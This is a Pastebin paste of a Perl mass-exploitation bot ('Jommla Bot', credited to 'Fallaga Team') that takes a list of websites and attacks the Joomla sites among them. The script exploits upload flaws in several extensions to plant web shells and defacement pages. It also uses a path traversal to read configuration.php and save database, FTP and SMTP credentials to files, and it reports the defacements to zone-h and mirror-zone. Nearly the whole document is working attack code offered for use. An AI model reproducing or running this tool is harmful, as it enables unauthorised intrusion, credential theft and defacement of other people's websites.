API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 26th, 2017
357
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.87 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. use HTTP::Request;
  4. use LWP::UserAgent;
  5. use IO::Select;
  6. use HTTP::Response;
  7. use Term::ANSIColor;
  8. use HTTP::Request::Common qw(POST);
  9. use HTTP::Request::Common qw(GET);
  10. use URI::URL;
  11. use IO::Socket::INET;
  12. use Win32::Console::ANSI;
  13. my $datetime = localtime;
  14. $tmp="tmp";
  15. if (-e $tmp)
  16. {
  17. }
  18. else
  19. {
  20. mkdir $tmp or die "Error creating directory: $tmp";
  21. }
  22.  
  23. $rez="Result";
  24. if (-e $rez)
  25. {
  26. }
  27. else
  28. {
  29. mkdir $rez or die "Error creating directory: $rez";
  30. }
  31.  
  32. $logo="
  33.  
  34. Jommla Bot
  35.  
  36.  
  37. ";
  38.  
  39. print $logo;
  40. print "\t";
  41. print colored ("[ Code 4 Palestine |",'white on_black');
  42. print colored (" Love 4 Palestine |",'white on_green');
  43. print colored ("Life 4 Palestine ]",'white on_red'),"\n";
  44. print colored("[ GS-Bot Bazooka |Coded By Fallag Gassrini | Tunisian Fallaga Team ]",'white on_blue'),"\n\n\n";
  45. print colored ("Start At $datetime",'white on_red'),"\n\n";
  46. print "Enter Your Choose :";
  47. $a = <STDIN>;
  48. chomp $a;
  49. open(tarrget,"<$a") or die "Fuck you where is Website list -_- mafaka \n";
  50. while(<tarrget>){
  51. chomp($_);
  52. $site = $_;
  53. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  54. efrez();
  55. }
  56. sub efrez($site){
  57. $ua = LWP::UserAgent->new(keep_alive => 1);
  58. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  59. $ua->timeout (10);
  60.  
  61. my $efreez = $ua->get("$site")->content;
  62. if($efreez =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla!|Joomla|joomla/) {
  63. print colored("[JOOMLA] $site",'white on_magenta'),"\n\n\n";
  64. open(save, '>>tmp/joomla.txt');
  65. print save "$site\n";
  66. close(save);
  67. comjce();
  68. comediashell();
  69. comediaindex();
  70. comblog();
  71. comjdowloads();
  72. hdflvplayer();
  73. comfabr();
  74. indecomfabr();
  75. }
  76.  
  77. }
  78.  
  79. sub comjce($site){
  80. print colored ("[COM JCE]",'white on_red');
  81. $ua = LWP::UserAgent->new();
  82. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  83. $ua->timeout(15);
  84.  
  85.  
  86. $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  87.  
  88. $vulnurl=$site.$exploiturl;
  89. $res = $ua->get($vulnurl)->content;
  90. if ($res =~ m/No function call specified!/i){
  91. open(save, '>>Result/vulntargets.txt');
  92. print save "[JCE] $site\n";
  93. close(save);
  94.  
  95. print " .................. ";
  96. print color('bold white');
  97. print "[";
  98. print color('reset');
  99. print color('bold green');
  100. print "VULN JCE";
  101. print color('reset');
  102. print color('bold white');
  103. print "] ";
  104. print color('reset');
  105. print "\n[UPLOADING PICTURE]";
  106. my $res = $ua->post($vulnurl,
  107. Content_Type => 'form-data',
  108. Content => [
  109. 'upload-dir' => './../../',
  110. 'upload-overwrite' => 0,
  111. 'Filedata' => ["md.gif"],
  112. 'action' => 'upload'
  113. ]
  114. )->decoded_content;
  115. if ($res =~ m/"error":false/i){
  116.  
  117. }else{
  118. print " ......... ";
  119. print color('bold white');
  120. print "[";
  121. print color('reset');
  122. print color('bold green');
  123. print "PATCHED";
  124. print color('reset');
  125. print color('bold white');
  126. print "] \n";
  127. print color('reset');
  128. }
  129.  
  130. $remote = IO::Socket::INET->new(
  131. Proto=>'tcp',
  132. PeerAddr=>"$site",
  133. PeerPort=>80,
  134. Timeout=>15
  135. );
  136. $def= "$site/md.gif";
  137. $check = $ua->get($def)->status_line;
  138. if ($check =~ /200/){
  139. print " ......... ";
  140. print color('bold white');
  141. print "[";
  142. print color('reset');
  143. print color('bold green');
  144. print "DEFACED";
  145. print color('reset');
  146. print color('bold white');
  147. print "] \n";
  148. print color('reset');
  149. print "[LINK] => $def\n";
  150. zoneh();
  151. mirrorzon();
  152. }
  153. }else{print " .................. ";
  154. print color('bold white');
  155. print "[";
  156. print color('reset');
  157. print color('bold red');
  158. print "NOT VULN";
  159. print color('reset');
  160. print color('bold white');
  161. print "] \n";
  162. print color('reset');
  163. }
  164.  
  165. }
  166.  
  167. sub comediashell($site){
  168. print "\n";
  169. print colored ("[COM MEDIA]",'white on_red');
  170. $tarmedia="$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  171. $shlez = "md.PhP.txt";
  172. $shlz="$site/images/md.PhP.txt";
  173. $index="$site/gass.html";
  174. $ua = LWP::UserAgent->new;
  175. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  176. $sorm = $ua->get($tarmedia);
  177. $karza = $sorm->content;
  178. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  179. {
  180. $url = $1;
  181. $url =~ s/&amp;/&/gi;
  182. print " .................... [VULN]\n[UPLOADING SHELL]";
  183. open(save, '>>Result/vulntargets.txt');
  184. print save "[Media] $site\n";
  185. close(save);
  186. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  187. $check = $ua->get($shlz);
  188. if($check->content =~/MD-GHOST/ || $check->is_success ) {
  189. print" ........... ";
  190. print color('bold white');
  191. print "[";
  192. print color('reset');
  193. print color('bold green');
  194. print "SUCCESS";
  195. print color('reset');
  196. print color('bold white');
  197. print "] \n";
  198. print color('reset');
  199. print colored ("[SHELL LINK] => $shlz",'white on_yellow'),"\n";
  200. open (TEXT, '>>Result/shells.txt');
  201. print TEXT "\n[ COM MEDIA SHELL] =>$shlz \n";
  202. close (TEXT);
  203. my $checkndex = $ua->get("$index")->content;
  204. if($checkndex=~/Hacked/){
  205. $def="$index";
  206.  
  207. print colored ("[INDEX LINK] => $def",'white on_yellow'),"\n";
  208. zoneh();
  209. mirrorzon()
  210. }
  211.  
  212. }
  213. }else{print " ................ ";
  214. print color('bold white');
  215. print "[";
  216. print color('reset');
  217. print color('bold red');
  218. print "NOT VULN";
  219. print color('reset');
  220. print color('bold white');
  221. print "] \n";
  222. print color('reset');
  223. }
  224. }
  225. sub comediaindex(){
  226. $shlez = "md.txt";
  227. $shlz="$site/images/md.txt";
  228. $ua = LWP::UserAgent->new;
  229. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  230. $sorm = $ua->get($tarmedia);
  231. $karza = $sorm->content;
  232. if($karza =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $karza =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  233. {
  234. $url = $1;
  235. $url =~ s/&amp;/&/gi;
  236. print "\n[UPLOADING INDEX]";
  237. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$shlez] ]);
  238. $check = $ua->get($shlz);
  239. if($check->content =~/Hacked/ || $check->is_success ) {
  240. print " ........... ";
  241. print color('bold white');
  242. print "[";
  243. print color('reset');
  244. print color('bold green');
  245. print "DEFACED";
  246. print color('reset');
  247. print color('bold white');
  248. print "] \n";
  249. print color('reset');
  250.  
  251. print colored ("[INDEX LINK] => $shlz",'white on_yellow'),"\n";
  252. $def="$shlz";
  253. zoneh();
  254. mirrorzon()
  255. }
  256.  
  257. }
  258. }
  259.  
  260. sub comjdowloads($site){
  261. print colored ("[COM JDOWNLOADS]",'white on_red');
  262. $file="mdghost.rar";
  263. $filez="md.php.php.j";
  264. $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
  265. $shellpath= $site . '/images/jdownloads/screenshots/md.php.j';
  266.  
  267. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  268. $ua->timeout(10);
  269. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  270.  
  271. my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"MD-GHOST", mail=>"fallagassrini@mail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  272.  
  273. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  274. print " ............... ";
  275. print color('bold white');
  276. print "[";
  277. print color('reset');
  278. print color('bold green');
  279. print "VULN";
  280. print color('reset');
  281. print color('bold white');
  282. print "] \n";
  283. print color('reset');
  284. open(save, '>>Result/vulntargets.txt');
  285. print save "[jdown] $site\n";
  286. close(save);
  287.  
  288. print "[SCANING SHELL] ................ ";
  289. print color('bold white');
  290. print "[";
  291. print color('reset');
  292. print color('bold blue');
  293. print "WAIT";
  294. print color('reset');
  295. print color('bold white');
  296. print "] \n";
  297. print color('reset');
  298.  
  299. my $checkshell = $ua->get("$shellpath")->content;
  300. if($checkshell =~/Fallagassrini/) {
  301. print colored ("[SHELL LINK] => $shellpath",'white on_green'),"\n";
  302. open (TEXT, '>>Result/shells.txt');
  303. print TEXT "[ JDWN SHELL] => $shellpath\n";
  304. close (TEXT);
  305. }else{
  306. print "[ERROR] ................... ";
  307. print color('bold white');
  308. print "[";
  309. print color('reset');
  310. print color('bold red');
  311. print "SHELL 404";
  312. print color('reset');
  313. print color('bold white');
  314. print "] \n";
  315. print color('reset');
  316.  
  317. }
  318.  
  319.  
  320.  
  321. print "[JDOWNLOAD INDEX]";
  322.  
  323. $def = $site . '/images/jdownloads/screenshots/md.html.j';
  324. $filee="md.rar";
  325. $filezz="md.html.j";
  326. my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"MD-GHOST", mail=>"fallagassrini@gmail.com", filetitle =>"Fallaga Team", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  327. if ($exploit->decoded_content =~ /The file was successfully transferred to the server/) {
  328. print " ................ ";
  329. print color('bold white');
  330. print "[";
  331. print color('reset');
  332. print color('bold green');
  333. print "OK";
  334. print color('reset');
  335. print color('bold white');
  336. print "] \n";
  337. print color('reset');
  338. print "[SCANING INDEX] ................";
  339. print color('bold white');
  340. print "[";
  341. print color('reset');
  342. print color('bold blue');
  343. print "WAIT";
  344. print color('reset');
  345. print color('bold white');
  346. print "] \n";
  347. print color('reset');
  348.  
  349.  
  350. my $response = $ua->get("$def")->status_line;
  351. if ($response =~ /200/){
  352. print "[DEFACE] .....................";
  353. print color('bold white');
  354. print "[";
  355. print color('reset');
  356. print color('bold green');
  357. print "SUCCESS";
  358. print color('reset');
  359. print color('bold white');
  360. print "] \n";
  361. print color('reset');
  362.  
  363. print colored ("[INDEX LINK] => $def",'white on_green'),"\n";
  364. zoneh();
  365. mirrorzon();
  366. }else{
  367. print "[DEFACE] .......................";
  368. print color('bold white');
  369. print "[";
  370. print color('reset');
  371. print color('bold red');
  372. print "ERROR";
  373. print color('reset');
  374. print color('bold white');
  375. print "] \n";
  376. print color('reset');
  377.  
  378. }
  379. }
  380. }else{ print " ........... ";
  381. print color('bold white');
  382. print "[";
  383. print color('reset');
  384. print color('bold red');
  385. print "NOT VULN";
  386. print color('reset');
  387. print color('bold white');
  388. print "] \n";
  389. print color('reset');
  390.  
  391. }
  392.  
  393. }
  394.  
  395.  
  396. sub hdflvplayer($site){
  397.  
  398. print colored ("[HDFLVPLAYER]",'white on_red');
  399. $conflink = "$site/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php";
  400. $ua = LWP::UserAgent->new(keep_alive => 1);
  401. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  402. $ua->timeout (10);
  403. $resp = $ua->request(HTTP::Request->new(GET => $conflink));
  404. $cont = $resp->content;
  405. if($cont =~ m/class JConfig|mosConfig_offline_message/g){
  406. print " .................. ",
  407. print color('bold white');
  408. print "[";
  409. print color('reset');
  410. print color('bold green');
  411. print "VULN";
  412. print color('reset');
  413. print color('bold white');
  414. print "] \n";
  415. print color('reset');
  416. open(save, '>>Result/vulntargets.txt');
  417. print save "[hdflv] $site\n";
  418. close(save);
  419.  
  420.  
  421.  
  422.  
  423. open (TEXT, '>>Result/databases.txt');
  424. print TEXT "$site\n[+]DATABASE INFO\n";
  425. close (TEXT);
  426. print color("white"),"\t[+]DATABASE INFO\n";
  427. if ($cont =~ /user = \'(.*?)\';/){
  428. print color("red"),"\t[-]Database User = $1 \n";
  429. print color 'reset';
  430. open (TEXT, '>>Result/databases.txt');
  431. print TEXT "[-]Database User = $1 \n";
  432. close (TEXT);
  433. }
  434. if ($cont =~ /password = \'(.*?)\';/){
  435. print color("red"),"\t[-]Database Password = $1 \n";
  436. print color 'reset';
  437. open (TEXT, '>>Result/databases.txt');
  438. print TEXT "[-]Database Password = $1\n";
  439. close (TEXT);
  440. }
  441. if ($cont =~ /db = \'(.*?)\';/){
  442. print color("red"),"\t[-]Database Name = $1 \n";
  443. print color 'reset';
  444. open (TEXT, '>>Result/databases.txt');
  445. print TEXT "[-]Database Name = $1\n";
  446. close (TEXT);
  447. }
  448. if ($cont =~ /host = \'(.*?)\';/){
  449. print color("red"),"\t[-]Database Host = $1 \n";
  450. print color 'reset';
  451. open (TEXT, '>>Result/databases.txt');
  452. print TEXT "[-]Database Host = $1\n";
  453. close (TEXT);
  454. }
  455.  
  456.  
  457. print color("white"),"\t[+] FTP INFO\n";
  458. if ($cont =~ /ftp_host = \'(.*?)\';/){
  459. print color("red"),"\t[-]FTP Host = $1 \n";
  460. print color 'reset';
  461. open (TEXT, '>>Result/databases.txt');
  462. print TEXT "\n[+] FTP INFO\n[-]FTP Host = $1\n";
  463. close (TEXT);
  464. }
  465. if ($cont =~ /ftp_port = \'(.*?)\';/){
  466. print color("red"),"\t[-]FTP Port = $1 \n";
  467. print color 'reset';
  468. open (TEXT, '>>Result/databases.txt');
  469. print TEXT "[-]FTP Port = $1\n";
  470. close (TEXT);
  471. }
  472. if ($cont =~ /ftp_user = \'(.*?)\';/){
  473. print color("red"),"\t[-]FTP User = $1 \n";
  474. print color 'reset';
  475. open (TEXT, '>>Result/databases.txt');
  476. print TEXT "[-]FTP User = $1\n";
  477. close (TEXT);
  478. }
  479. if ($cont =~ /ftp_pass = \'(.*?)\';/){
  480. print color("red"),"\t[-]FTP Pass = $1 \n";
  481. print color 'reset';
  482. open (TEXT, '>>Result/databases.txt');
  483. print TEXT "[-]FTP Pass = $1\n\n";
  484. close (TEXT);
  485. }
  486.  
  487.  
  488.  
  489. print color("white"),"\t[+] SMTP INFO\n";
  490. if ($cont =~ /smtpuser = \'(.*?)\';/){
  491. print color("red"),"\t[-]SMTP User = $1 \n";
  492. print color 'reset';
  493. open (TEXT, '>>Result/databases.txt');
  494. print TEXT "[+] SMTP INFO\n[-]SMTP User = $1\n";
  495. close (TEXT);
  496. }
  497. if ($cont =~ /smtppass = \'(.*?)\';/){
  498. print color("red"),"\t[-]SMTP Password = $1 \n";
  499. print color 'reset';
  500. open (TEXT, '>>Result/databases.txt');
  501. print TEXT "[-]SMTP Password = $1\n";
  502. close (TEXT);
  503. }
  504. if ($cont =~ /smtpport = \'(.*?)\';/){
  505. print color("red"),"\t[-]SMTP Port = $1 \n";
  506. print color 'reset';
  507. open (TEXT, '>>Result/databases.txt');
  508. print TEXT "[-]SMTP Port = $1\n";
  509. close (TEXT);
  510. }
  511. if ($cont =~ /smtphost = \'(.*?)\';/){
  512. print color("red"),"\t[-]SMTP Host = $1 \n\n";
  513. print color 'reset';
  514. open (TEXT, '>>Result/databases.txt');
  515. print TEXT "[-]SMTP Host = $1\n";
  516. close (TEXT);
  517.  
  518. }
  519.  
  520. }else{print " .............. ";
  521. print color('bold white');
  522. print "[";
  523. print color('reset');
  524. print color('bold red');
  525. print "NOT VULN";
  526. print color('reset');
  527. print color('bold white');
  528. print "] \n";
  529. print color('reset');
  530.  
  531. }
  532.  
  533. }
  534.  
  535.  
  536. sub comfabr(){
  537. print colored ("[COM FABRIC]",'white on_red');
  538. $comfab= $site . '/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0';
  539. $def = $site . '/media/md.txt';
  540. $fabshell = $site . '/media/md.PhP.txt';
  541. $indfile="md.txt";
  542. $shelfile="md.PhP.txt";
  543. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  544. $ua->timeout(10);
  545. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  546. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$shelfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  547. my $checkfab = $ua->get("$fabshell")->content;
  548. if($checkfab =~/Fallagassrini/) {
  549. print " ................... ";
  550.  
  551. print color('bold white');
  552. print "[";
  553. print color('reset');
  554. print color('bold green');
  555. print "VULN";
  556. print color('reset');
  557. print color('bold white');
  558. print "] \n";
  559. print color('reset');
  560. open(save, '>>Result/vulntargets.txt');
  561. print save "[fabric] $site\n";
  562. close(save);
  563.  
  564. print "[SHELL LINK] => $fabshell\n";
  565. open (TEXT, '>>Result/shells.txt');
  566. print TEXT "[COM FABRIC] =>$fabshell \n";
  567. close (TEXT);
  568. }else{
  569. print " ............... ";
  570. print color('bold white');
  571. print "[";
  572. print color('reset');
  573. print color('bold red');
  574. print "NOT VULN";
  575. print color('reset');
  576. print color('bold white');
  577. print "] \n";
  578. print color('reset');
  579.  
  580. }
  581. }
  582.  
  583. sub indecomfabr(){
  584. print "[UPLOAD INDEX COM FABRIC] .......";
  585. print color('bold white');
  586. print "[";
  587. print color('reset');
  588. print color('bold blue');
  589. print "WAIT";
  590. print color('reset');
  591. print color('bold white');
  592. print "] \n";
  593. print color('reset');
  594. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  595. $ua->timeout(10);
  596. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  597. my $indfab = $ua->post("$comfab", Cookie => "", Content_Type => "form-data", Content => ["userfile" => ["$indfile"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]);
  598. my $checkfab = $ua->get("$def")->content;
  599. if($checkfab =~/Hacked/) {
  600. open(save, '>>Result/vulntargets.txt');
  601. print save "[fabric] $site\n";
  602. close(save);
  603.  
  604. print "[DEFACE] .................... ";
  605. print color('bold white');
  606. print "[";
  607. print color('reset');
  608. print color('bold green');
  609. print "SUCCESS";
  610. print color('reset');
  611. print color('bold white');
  612. print "] \n";
  613. print color('reset');
  614.  
  615. print "[INDEX LINK] => $def\n";
  616. zoneh();
  617. mirrorzon();
  618. }else{
  619. print "[DEFACE] ...................... ";
  620. print color('bold white');
  621. print "[";
  622. print color('reset');
  623. print color('bold red');
  624. print "ERROR";
  625. print color('reset');
  626. print color('bold white');
  627. print "] \n";
  628. print color('reset');
  629.  
  630. }
  631. }
  632.  
  633.  
  634. sub comusers(){
  635. print colored ("[COM USER SCANNER]",'white on_red');
  636. $ua = LWP::UserAgent->new(keep_alive => 1);
  637. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  638. $ua->timeout (20);
  639.  
  640. my $exploit = "$site/index.php?option=com_users&view=registration";
  641. my $checkk = $ua->get("$exploit")->content;
  642. if($checkk =~/jform_email2-lbl/) {
  643. print" ............. ";
  644. print color('bold white');
  645. print "[";
  646. print color('reset');
  647. print color('bold green');
  648. print "VULN";
  649. print color('reset');
  650. print color('bold white');
  651. print "] \n";
  652. print color('reset');
  653. open(save, '>>Result/vulntargets.txt');
  654. print save "[users] $site\n";
  655. close(save);
  656.  
  657. }else{
  658. print" ......... ";
  659. print color('bold white');
  660. print "[";
  661. print color('reset');
  662. print color('bold red');
  663. print "NOT VULN";
  664. print color('reset');
  665. print color('bold white');
  666. print "] \n";
  667. print color('reset');
  668. }
  669. }
  670.  
  671. sub comadsmanegr(){
  672. print colored ("[COM ADS MANAGER]",'white on_red');
  673. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  674. if($site !~ /http:\/\//) { $target = "http://$site/"; };
  675. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  676. $ua->timeout(10);
  677. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  678. my $exploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], name => "xGassx.html"]);
  679. if ($exploit->decoded_content =~ /xGassx.html/) {
  680. print " .............. [VULN]\n";
  681. open(save, '>>Result/vulntargets.txt');
  682. print save "[ads] $site\n";
  683. close(save);
  684.  
  685. print "[UPLOAD INDEX] ................... ";
  686. print color('bold white');
  687. print "[";
  688. print color('reset');
  689. print color('bold green');
  690. print "OK";
  691. print color('reset');
  692. print color('bold white');
  693. print "] \n";
  694. print color('reset');
  695.  
  696. $def="$site/tmp/plupload/xGassx.html";
  697. my $checkdef = $ua->get("$def")->content;
  698. if($checkdef =~/Hacked|Defaced|Fallag|Gassrini/) {
  699. print "[DEFACE] .................... ";
  700. print color('bold white');
  701. print "[";
  702. print color('reset');
  703. print color('bold green');
  704. print "SUCCESS";
  705. print color('reset');
  706. print color('bold white');
  707. print "] \n";
  708. print color('reset');
  709. print "[INDEX LINK] => $def\n";
  710. zoneh();
  711. mirrorzon();
  712. adshell();
  713. }
  714. }else{print " .......... ";
  715. print color('bold white');
  716. print "[";
  717. print color('reset');
  718. print color('bold red');
  719. print "NOT VULN";
  720. print color('reset');
  721. print color('bold white');
  722. print "] \n";
  723. print color('reset');
  724. }
  725. }
  726.  
  727.  
  728.  
  729.  
  730. sub adshell(){
  731.  
  732. print "[UPLOAD SHELL] ................... ";
  733. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  734. my $exploitxx = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["loader.jpg"], name => "xGassrinix.php"]);
  735. if ($exploitxx->decoded_content =~ /xGassrinix.php/) {
  736. print color('bold white');
  737. print "[";
  738. print color('reset');
  739. print color('bold green');
  740. print "OK";
  741. print color('reset');
  742. print color('bold white');
  743. print "] \n";
  744. print color('reset');
  745. print "[SCANING SHELL] ................ ";
  746. print color('bold white');
  747. print "[";
  748. print color('reset');
  749. print color('bold blue');
  750. print "WAIT";
  751. print color('reset');
  752. print color('bold white');
  753. print "] \n";
  754. print color('reset');
  755.  
  756. my $check = $ua->get("$site/tmp/plupload/xGassrinix.php")->content;
  757. my $checkk = $ua->get("$site/xGSx.php")->content;
  758. if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  759. print "[SHELL] ......................";
  760. print color('bold white');
  761. print "[";
  762. print color('reset');
  763. print color('bold green');
  764. print "SUCCESS";
  765. print color('reset');
  766. print color('bold white');
  767. print "] \n";
  768. print color('reset');
  769. print "[SHELL LINK] => $site/xGSx.php\n";
  770. open(save, '>>Result/shells.txt');
  771. print save "[ADS] $site/xGSx.php\n";
  772. close(save);
  773. my $checkjo = $ua->get("$site/un.php")->content;
  774. if($checkjo =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  775. print "\n";
  776. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  777. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  778. print "\n";
  779. open(save, '>>Result/shells.txt');
  780.  
  781. print save "Path : $1\nKernel:$2\n";
  782.  
  783. close(save);
  784. }
  785. }else{
  786. print "[SHELL] ........................";
  787. print color('bold white');
  788. print "[";
  789. print color('reset');
  790. print color('bold green');
  791. print "ERROR";
  792. print color('reset');
  793. print color('bold white');
  794. print "] \n";
  795. print color('reset');
  796. }
  797.  
  798. }
  799. }
  800. sub comblog(){
  801. print colored ("[COM BLOG SCANNER]",'white on_red');
  802.  
  803.  
  804. $uaa = LWP::UserAgent->new(keep_alive => 1);
  805. $uaa->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  806. $uaa->timeout (10);
  807.  
  808. my $exploitblog = "$site/index.php?option=com_myblog&task=ajaxupload";
  809. my $checkblog = $uaa->get("$exploitblog")->content;
  810. if($checkblog =~/has been uploaded/) {
  811. print" ............. ";
  812. print color('bold white');
  813. print "[";
  814. print color('reset');
  815. print color('bold green');
  816. print "VULN";
  817. print color('reset');
  818. print color('bold white');
  819. print "] \n";
  820. print color('reset');
  821. open(save, '>>Result/vulntargets.txt');
  822. print save "[blog] $site\n";
  823. close(save);
  824.  
  825. print "[ $site EXPLOIT IT MANUEL ]\n";
  826. }
  827. else {print " ......... ";
  828. print color('bold white');
  829. print "[";
  830. print color('reset');
  831. print color('bold red');
  832. print "NOT VULN";
  833. print color('reset');
  834. print color('bold white');
  835. print "] \n";
  836. print color('reset');
  837.  
  838. }
  839. }
  840.  
  841.  
  842. sub zoneh(){
  843. print colored ("[ZONE-H]",'black on_yellow');
  844. open(save, '>>Result/index.txt');
  845. print save "$def\n";
  846. close(save);
  847.  
  848. $hack="MD-GHOST";
  849. $zn="http://zone-h.org/notify/single";
  850. $lwp=LWP::UserAgent->new;
  851. $res=$lwp -> post($zn,[
  852. 'defacer' => $hack,
  853. 'domain1' => $def,
  854. 'hackmode' => '15',
  855. 'reason' => '1',
  856. 'submit' => 'Send',
  857. ]);
  858. if ($res->content =~ /color="red">ERROR<\/font><\/li>/) {
  859. print " ...................... ";
  860. print color('bold white');
  861. print "[";
  862. print color('reset');
  863. print color('bold red');
  864. print "ERROR";
  865. print color('reset');
  866. print color('bold white');
  867. print "] \n";
  868. print color('reset');
  869.  
  870. }
  871. elsif ($res->content =~ /color="red">OK<\/font><\/li>/) {
  872. print " ......................... ";
  873. print color('bold white');
  874. print "[";
  875. print color('reset');
  876. print color('bold green');
  877. print "OK";
  878. print color('reset');
  879. print color('bold white');
  880. print "] \n";
  881. print color('reset');
  882.  
  883.  
  884. }
  885. else
  886. {
  887. print colored ("[ERROR !]Error Can't Submit it On Zone-h Gass",'white on_red'),"\n";
  888.  
  889. }
  890. }
  891. sub mirrorzon(){
  892. print colored ("[MIRROR-ZONE]",'black on_yellow');
  893. $mz = "http://mirror-zone.org/notify/singel.php";
  894. $fgtn="MD-GHOST";
  895. $mzp = POST $mz, [hacker => $fgtn, text => $def];
  896. $response = $ua->request($mzp);
  897. if ($response->content =~ /Deface Add successfully added to Archive .../) {
  898. print " .................... ";
  899. print color('bold white');
  900. print "[";
  901. print color('reset');
  902. print color('bold green');
  903. print "OK";
  904. print color('reset');
  905. print color('bold white');
  906. print "] \n";
  907. print color('reset');
  908. }else {
  909. print " ................. ";
  910. print color('bold white');
  911. print "[";
  912. print color('reset');
  913. print color('bold red');
  914. print "ERROR";
  915. print color('reset');
  916. print color('bold white');
  917. print "] \n";
  918. print color('reset');
  919. }
  920. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!